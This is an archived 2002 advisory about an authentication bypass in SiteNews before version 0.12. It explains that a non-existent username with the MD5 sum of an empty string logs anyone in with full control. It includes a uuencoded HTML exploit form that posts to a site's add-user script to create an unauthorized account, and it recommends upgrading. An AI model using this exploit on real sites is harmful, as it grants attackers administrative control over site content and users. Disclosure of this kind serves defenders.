Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5117.htm

SiteNews remote add user exploit



20th Feb 2002 [SBWID-5117]
COMMAND

	SiteNews remote add user exploit
	

	

SYSTEMS AFFECTED

	prior to version 0.12

PROBLEM

	Ulf Harnhammar found following :
	

	SiteNews is an open-sourced system  for  displaying  and  managing  news
	items on websites (http://www.linuxnetwork.nl/).
	

	The function GetPassword in function.php returns an empty  string,  when
	you ask for a non-existent username. This, together with the  fact  that
	the program sends usernames in cleartext  and  passwords  as  MD5  sums,
	means that you can log in without an account, by posting a  non-existent
	username and the MD5 sum for an empty string as the  password.  SiteNews
	has no concept of user levels,  so  once  you  are  in,  you  have  full
	control over all news items and all users.
	

	 Exploit

	 =======

	

	You  type  in  a  non-existent  username  and  the  user  and   password
	combination that you wish to add to the system, and the exploit  creates
	the new user for you, despite the fact that you are not authorized.
	

	

	

	begin 644 sitenews_exploit.html

	M/\"%$3T-465!%($A434P@4%5\"3$E#(\"(M+R]7,T,O+T141\"!(5$U,(#0N,#$@

	M5\')A;G-I=&EO;F%L+R]%3B(*(FAT=\'`Z+R]W=W<N=S,N;W)G+U12+VAT;6PT

	M+VQO;W-E+F1T9\"(^\"CQH=&UL/@H\\:&5A9#X*/\'1I=&QE/E-I=&5.97=S($5X

	M<&QO:70@,\"XQ/\"]T:71L93X*/&UE=&$@:\'1T<\"UE<75I=CTB0V]N=&5N=\"U4

	M>7!E(B!C;VYT96YT/2)T97AT+VAT;6P[(&-H87)S970]:7-O+3@X-3DM,2(^

	M\"CPO:&5A9#X*\"CQB;V1Y(&)G8V]L;W(](B-F9F9F9F8B(\'1E>\'0](B,P,#`P

	M,#`B(&QI;FL](B,P,#`P,#`B(&%L:6YK/2(C,#`P,#`P(@IV;&EN:STB(S`P

	M,#`P,\"(^\"CQH,3Y3:71E3F5W<R!%>\'!L;VET(#`N,3PO:#$^\"@H\\9F]R;2!M

	M971H;V0](E!/4U0B(&%C=&EO;CTB:\'1T<#HO+W=W=RYV:6-T:6TN8V]M+W-I

	M=&5N97=S+V%D;6EN+V%D9%]U<V5R+G!H<\"(*96YC=\'EP93TB;75L=&EP87)T

	M+V9O<FTM9&%T82(^\"E=R:71T96X@8GD@/&$@:\')E9CTB;6%I;\'1O.FUE=&%U

	M<D!P<F]N=&]M86EL+F-O;2(^56QF($@F875M;#MR;FAA;6UA<CPO83X@:6X*

	M,C`P,BX\\<#X*\"E1H:7,@97AP;&]I=\"!W:6QL(&%D9\"!A(&YE=R!U<V5R(\'1O

	M(&$@4VET94YE=W,@:6YS=&%L;&%T:6]N+B!4:&4@97AP;&]I=\"!U<V5R\"FES

	M(&)A<VEC86QL>2!A;GD@;F]N+65X:7-T96YT(\'5S97(L(\'-O(\'EO=2!J=7-T

	M(\'1Y<&4@<V]M92!R86YD;VT@8VAA<F%C=&5R<PIT:&5R92X\\<#X*\"D5X<&QO

	M:70@=7-E<CH\\8G(^\"CQI;G!U=\"!T>7!E/2)T97AT(B!N86UE/2)U<V5R;F%M

	M92(@<VEZ93TB,C`B/CQB<CX*/&EN<\'5T(\'1Y<&4](FAI9&1E;B(@;F%M93TB

	M<&%S<W=O<F0B\"G9A;\'5E/2)D-#%D.&-D.3AF,#!B,C`T93DX,#`Y.3AE8V8X

	M-#(W92(@<VEZ93TB,\"(^\"CPA+2T@5&AI<R!I<R!T:&4@340U(\'-U;2!F;W(@

	M86X@96UP=\'D@<W1R:6YG+B`M+3X*3F5W(\'5S97(Z/&)R/@H\\:6YP=70@=\'EP

	M93TB=&5X=\"(@;F%M93TB;F5W7W5S97(B(\'-I>F4](C(P(CX\\8G(^\"CQI;G!U

	M=\"!T>7!E/2)H:61D96XB(&YA;64](F%C=&EO;C$B(\'9A;\'5E/2(Q(B!S:7IE

	M/2(P(CX*3F5W(\'!A<W-W;W)D.CQB<CX*/&EN<\'5T(\'1Y<&4](G1E>\'0B(&YA

	M;64](FYE=U]P87-S=V]R9\"(@<VEZ93TB,C`B/CQB<CX*/&EN<\'5T(\'1Y<&4]

	M(G-U8FUI=\"(@=F%L=64](D5X<&QO:70@:70B/@H\\+V9O<FT^\"@H\\+V)O9\'D^

	)\"CPO:\'1M;#X*

	`

	end

	

	

SOLUTION

	Upgrade to V 0.12


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH